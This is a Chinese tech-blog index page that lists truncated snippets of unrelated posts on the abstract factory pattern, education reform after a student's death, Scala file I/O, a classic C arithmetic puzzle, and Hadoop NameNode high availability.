抽象工厂模式：工厂模式有一个问题就是，类的创建依赖于工厂类，也就是说，如果想要拓展程序，必须对工厂类进行修改，这违背了闭包原则。我们采用抽象工厂模式，创建多个工厂类，这样一旦需要增加新的功能，直接增加新的工厂类就可以了，不需要修改之前的代码。总结：这个模式的好处就是，如果想增加一个功能，就需要做一个实现类，
评"高中女生军训期跳楼” nannan408
首先，先抛出我的观点，各位看官少点砖头。那就是，中国的差异化教育必须做起来。孔圣人有云：有教无类。不同类型的人，都应该有对应的教育方法。目前中国的一体化教育，不知道已经扼杀了多少创造性人才。我们出不了爱迪生，出不了爱因斯坦，很大原因，是我们的培养思路错了，我们是第一要“顺从”。如果不顺从，我们的学校，就会用各种方法，罚站，罚写作业，各种罚。军
scala如何读取和写入文件内容？ qindongliang1922 java jvm scala
直接看如下代码： package file import java.io.RandomAccessFile import java.nio.charset.Charset import scala.io.Source import scala.reflect.io.{File, Path} /** * Created by qindongliang on 2015/
C语言算法之百元买百鸡 qiufeihu c 算法
中国古代数学家张丘建在他的《算经》中提出了一个著名的“百钱买百鸡问题”，鸡翁一，值钱五，鸡母一，值钱三，鸡雏三，值钱一，百钱买百鸡，问翁，母，雏各几何？代码如下： #include <stdio.h> int main() { int cock,hen,chick; /*定义变量为基本整型*/ for(coc
Hadoop集群安全性：Hadoop中Namenode单点故障的解决方案及详细介绍AvatarNode wyz2009107220 NameNode
正如大家所知，NameNode在Hadoop系统中存在单点故障问题，这个对于标榜高可用性的Hadoop来说一直是个软肋。本文讨论一下为了解决这个问题而存在的几个solution。 1. Secondary NameNode 原理：Secondary NN会定期的从NN中读取editlog，与自己存储的Image进行合并形成新的metadata image 优点：Hadoop较早的版本都自带，